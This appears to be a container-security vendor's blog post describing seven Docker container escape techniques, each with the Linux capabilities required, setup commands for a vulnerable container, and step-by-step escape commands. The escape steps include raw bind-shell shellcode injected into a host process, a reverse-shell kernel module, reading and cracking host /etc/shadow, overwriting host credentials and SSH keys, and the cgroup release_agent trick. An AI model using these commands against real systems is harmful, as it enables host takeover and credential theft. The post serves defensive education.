Why choose Panoptica?
Four reasons you need the industry’s leading cloud-native security solution.
In today's modern environment, where containers have become the go-to solution for application deployments, the security of these containers has emerged as a critical concern. In fact, containers have become the primary attack surface in many scenarios. In this post, we will delve into container escapes, exploring seven common techniques that can be used to breach container boundaries. For each escape technique, we will emphasize the specific configuration of a vulnerable container that makes it susceptible to the escape technique, and outline the minimal capabilities required inside the container to execute the escape. This knowledge will allow you to evaluate whether a container is suitable for executing an escape and select the most effective protective measures accordingly. By understanding these essential requirements, you can effectively evaluate the security posture of your containers and take necessary precautions to mitigate potential risks.
In this post we will assume some basic understanding of Linux and Docker. If you are not familiar with Linux capabilities and containers, you can read this 3-part post by Datadog that explains important concepts.
The container escape techniques described in this post are already known. This post highlights the minimal required Linux capabilities within the container and its setup to execute the escape.
The table below shows what the minimal required Linux capabilities are in each escape technique.
ID | Techniques Name | Minimal Linux Capabilities |
1 | Mount the host filesystem | SYS_ADMIN |
2 | Use a mounted docker socket | No capability is required |
3 | Process Injection | SYS_PTRACE |
4 | Adding a malicious kernel module | SYS_MODULE |
5 | Reading secrets from the host | DAC_READ_SEARCH |
6 | Overriding files on host | DAC_READ_SEARCH, DAC_OVERRIDE |
7 | Abusing notify on release | SYS_ADMIN, DAC_OVERRIDE |
Before we delve into the different techniques to escape a container, we would like to highlight few important notes:
* In escape techniques number 6, 7 DAC_OVERRIDE capability is required for the escape commands.
--cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE --cap-add=<CAPABILITY>
Escape description
This technique enables escape from a container by mounting the host filesystem.
Vulnerable container requirements
Commands to setup a vulnerable container
docker run -it --cap-drop=ALL --cap-add=SYS_ADMIN --security-opt apparmor=unconfined --device=/dev/:/ ubuntu bash
docker run -it --cap-drop=ALL --cap-add=SYS_ADMIN --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE --security-opt apparmor=unconfined --device=/dev/:/ ubuntu bash
Note: AppArmor protection disables ‘mount’ operation even if the SYS_ADMIN capability is assigned to container process. Thus, we disable AppArmor during a vulnerable container creation.
TIP: You can see which AppArmor profile, if any, applies to container’s process by inspecting the ‘/proc/$$/attr/current’ file.
Commands to escape the container
mount /dev/<DEVICE-FILE> /mnt
ls /mnt
Escape description
Docker daemon is the process that manages containers on the host and listens for Docker API requests via the Docker socket. If the Docker socket is mounted in the container, it allows to communicate with Docker daemon from within the container.
Vulnerable container requirements
# docker install: https://docs.docker.com/engine/install/ubuntu/
Commands to setup a vulnerable container
docker run -it --cap-drop=ALL -v /var/run/docker.sock:/run/docker.sock ubuntu bash
docker run -it --cap-drop=ALL --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE -v /var/run/docker.sock:/run/docker.sock ubuntu bash
Commands to escape the container
Create a privilege container with host filesystem mounted inside the container.
docker run -it --privileged -v /:/host/ ubuntu bash -c "chroot /host/"
In the command above we create a new privileged container that mounts the host files system and uses it to escape from the first container to the host.
Escape description
Process injection allows one process to write into the memory space of another process and execute a shellcode. To inject a shellcode to a process in the host, the container must have 2 things:
The inject operation can fail and could lead to unwanted behavior. Therefore, to avoid such a situation, in the escape technique we will use a Python http server that runs on the host as the target process and inject a shellcode into its memory.
Vulnerable container and host requirements
apt install vim # or any other editor
apt install gcc
apt install net-tools
apt install netcat
/usr/bin/python3 -m http.server 8080 &
Commands to setup a vulnerable container
docker run -it --pid=host --cap-drop=ALL --cap-add=SYS_PTRACE --security-opt apparmor=unconfined ubuntu bash
docker run -it --pid=host --cap-drop=ALL --cap-add=SYS_PTRACE --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE --security-opt apparmor=unconfined ubuntu bash
Note: AppArmor protection disables ‘ptrace’ operation even if the SYS_PTRACE capability is assigned to the container process. Thus, we disable AppArmor during a vulnerable container creation.
Commands to escape the container
In this technique we use this infect.c code (by 0x00pf) to create an injector. We have also replaced the shellcode (lines 36-39) with the following shell code taken from https://www.exploit-db.com/exploits/41128 and changed the ‘SHELLCODE_SIZE’ (line 33) to 87.
"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
Use the commands bellow to escape the container:
# List process that runs on the host and container.
ps -eaf | grep "/usr/bin/python3 -m http.server 8080" | head -n 1
# Copy and paste the payload from inject.c
vim inject.c
gcc -o inject inject.c
# Inject the shellcode payload that will open a listener over port 5600
./inject <PID>
# Bind over port 5600
nc <HOST-IP> 5600
Escape description
Linux containers share the same operating system kernel but are isolated in their container process from the rest of the system. A container that has the SYS_MODULE capability can load and unload kernel modules into the shared kernel. In this container escape technique, we will create a module in the container that will open a reverse shell from the host. Next, we will utilize the SYS_MODULE capability to add this module as a kernel module.
Vulnerable container requirements
apt install make
apt install -y vim # or any other editor
apt install -y netcat
apt install -y gcc
# Container should run with the same operating system version as the host.
# Get the kernel version by ‘uname -r’
version=$(uname -r)
apt install -y linux-headers-$version
apt install -y kmod
apt install net-tools
Commands to setup a vulnerable container
docker run -it --cap-drop=ALL --cap-add=SYS_MODULE ubuntu:<HOST-OS-VERDION> bash
docker run -it --cap-drop=ALL --cap-add=SYS_MODULE --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE ubuntu:<HOST-OS-VERDION> bash
Commands to escape the container
In this technique we use this reverse-shell.c code to create the malicious kernel module. We will change the IP in the reverse shell to the IP of the container. We also use the Makefile from there.
# Get the IP address of the container
ifconfig
# Copy the revese-shell.c and update the IP address in the code with the IP of the container
vim reverse-shell.c
# Copy the Makefile
vim Makefile
make
nc -lnvp 4444 &
# Inject the module into the kernel’s host
insmod reverse-shell.ko
fg %<JOB-ID>
Escape description
The DAC_READ_SEARCH capability allows to bypass file or directory read permission checks and use the ‘open_by_handle_at’ system call to read it. This system call allows to traverse the entire host’s filesystem. In this container escape technique, we will execute code that reads /etc/passwd and /etc/sahdow files from the host, using the ‘open_by_handle_at’ system call, and save their content in the container. Next, we will use ‘John the Ripper’ password cracker to obtain host users’ passwords which can be used for SSH connection to the host.
Vulnerable container and host requirements
apt install -y vim # or any other editor
apt install -y ssh
apt install -y gcc
apt install john -y # John the Ripper password cracker package
apt install net-tools
apt install -y netcat
sudo apt install openssh-server
Commands to setup a vulnerable container
sudo docker run -it --cap-drop=ALL --cap-add=DAC_READ_SEARCH ubuntu bash
sudo docker run -it --cap-drop=ALL --cap-add=DAC_READ_SEARCH --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE ubuntu bash
Commands to escape the container
In this technique we use the shocker.c exploit to read the files from the host.
# Copy the shocker.c content
vim shocker.c
gcc -o shocker shocker.c
# Use the shocker to read files from host:./shocker /host/path /container/path
./shocker /etc/passwd passwd
./shocker /etc/shadow shadow
# Combine passwd and shadow files
unshadow passwd shadow > password
# Use John the Ripper to crack passwords
john password
# Connect to the host with the John the ripper’s output credentials
ssh <USER-NAME>@<HOST-IP>
password: <password from john’s output>
Escape description
The DAC_OVERRIDE capability allows to bypass read, write and execute permissions checks. Container that runs with DAC_READ_SEARCH and DAC_OVERRIDE capabilities can read and write files on the host filesystem. In this escape, we will use these capabilities to update user’s credential files on the host, and later login to the host with the updated credentials.
In this container escape technique, we will present 2 options:
Vulnerable container and host requirements
apt install -y vim # or any other editor
apt install -y ssh
apt install -y gcc
sudo apt install openssh-server
Commands to setup a vulnerable container
Option 1 - override user’s password:
docker run -it --cap-drop=ALL --cap-add=DAC_OVERRIDE --cap-add=DAC_READ_SEARCH --cap-add=CHOWN ubuntu bash
docker run -it --cap-drop=ALL --cap-add=DAC_OVERRIDE --cap-add=DAC_READ_SEARCH --cap-add=CHOWN --cap-add=SETGID --cap-add=SETUID --cap-add=FOWNER ubuntu bash
Note: The CHOWN capability is needed to create a new user.
Option 2 – override user’s authorized keys:
docker run -it --cap-drop=ALL --cap-add=DAC_OVERRIDE --cap-add=DAC_READ_SEARCH ubuntu bash
docker run -it --cap-drop=ALL --cap-add=DAC_OVERRIDE --cap-add=DAC_READ_SEARCH --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER ubuntu bash
Commands to escape the container
In this technique we use the shocker.c exploit code from the previous escape technique and the shocker_write.c to write files to the host.
Option 1 - override user’s password:
# Copy and paste the shocker.c content
vim shocker.c
gcc -o read shocker.c
# Copy and paste the shocker_write.c content
vim shocker_write.c
gcc -o write shocker_write.c
# Use the ./read to read files from host: ./read /host/path /container/path
./read /etc/shadow shadow
./read /etc/passwd passwd
# Create new user and reset its password
useradd <USER-NAME>
echo '<USER-NAME>:<PASSWORD>' | chpasswd
# Update the new user details in the copied files from host
tail -1 /etc/passwd >> passwd
tail -1 /etc/shadow >> shadow
# Copy the new user password hash paste it also for the root user in the shadow file. This will allow us to elevate permissions on the host.
vim shadow
# Use the ./write to write files from host: ./write /host/path /container/path
./write /etc/passwd passwd
./write /etc/shadow shadow
# Connect to host over ssh using the new user (unprivileged)
ssh <USER>@<HOST-IP>
# Elevate privileges to root user with the new password
su
Note: we chose to escape using the new unprivileged user and later elevate the permissions to root on the host, to include cases where the “PermitRootLogin” option is set to “no” in the sshd_config file.
Option 2 – override user’s authorized keys:
# Generate new ssh key
ssh-keygen
# Copy and paste the shocker.c content
vim shocker.c
gcc -o read shocker.c
# Copy and paste the shocker_write.c content
vim shocker_write.c
gcc -o write shocker_write.c
# Use the ./read to read files from host: ./read /host/path /container/path
./read ~/.ssh/authorized_keys authorized_keys
# Copy the new ssh public key
# Remove the 'authorized_keys' content and paste the public key
vim authorized_keys
# Use the ./write to write files from host: ./write /host/path
./write ~/.ssh/authorized_keys authorized_keys
# Connect to host over ssh
ssh -i <PRIVATE-KEY> <USER>@<HOST-IP>
Escape description
Cgroups (control groups) is a kernel feature that allows for resource allocation and management in Linux systems. Cgroups are virtual filesystems that contain some files which describe the cgroups and their limits. Cgroups version 1 includes the file ‘notify_on_release’ that can contain 1 or 0. If the ‘notify_on_relesae’ is enabled (contains 1), when the last task in the cgroup leaves, the kernel executes the command specified in ‘release_agent’ file. In the next technique, inspired by Felix Wilhelm, we will use this functionality to execute arbitrary commands on the host.
Vulnerable Container and host requirements
TIP: you can check the container's host cgroups version by executing the following command:
mount | grep '^cgroup' | awk '{print $5}' | uniq
Commands to setup a vulnerable container
docker run -it --cap-drop=ALL --cap-add=SYS_ADMIN --cap-add=DAC_OVERRIDE --security-opt apparmor=unconfined ubuntu:16.04 bash
docker run -it --cap-drop=ALL --cap-add=SYS_ADMIN --cap-add=DAC_OVERRIDE --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --security-opt apparmor=unconfined ubuntu:16.04 bash
Note: AppArmor protection disables ‘mount’ operation even if the SYS_ADMIN capability is assigned to container process. Thus, we disable AppArmor during a vulnerable container creation.
TIP: You can see which AppArmor profile, if any, applies to container’s process by inspecting the ‘/proc/$$/attr/current’ file.
Commands to escape the container
# create /tmp/cgrp, mount RDMA cgroup controller into it and create child cgroup
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Enable the notify_on_release flag
echo 1 > /tmp/cgrp/x/notify_on_release
# Define host_path parameter with the container path on host
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Define path in release_agent which execute when all a cgroup tasks are done.
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
In today's ever-evolving digital landscape, container escapes continue to pose a significant threat to container security. As containers have become the preferred choice for application deployments, it is crucial to stay informed about the various techniques used to breach container boundaries.
Through this post, we have delved into seven common container escape techniques, shedding light on the essential configurations and minimal Linux capabilities required for each method. By providing this knowledge, we empower container operators to assess the vulnerability of their containers and determine the most effective protective measures. Remember, container escapes can allow unauthorized access and compromise the integrity of applications and systems. By understanding and addressing these risks, we can fortify our container environments and ensure the security and reliability of our applications.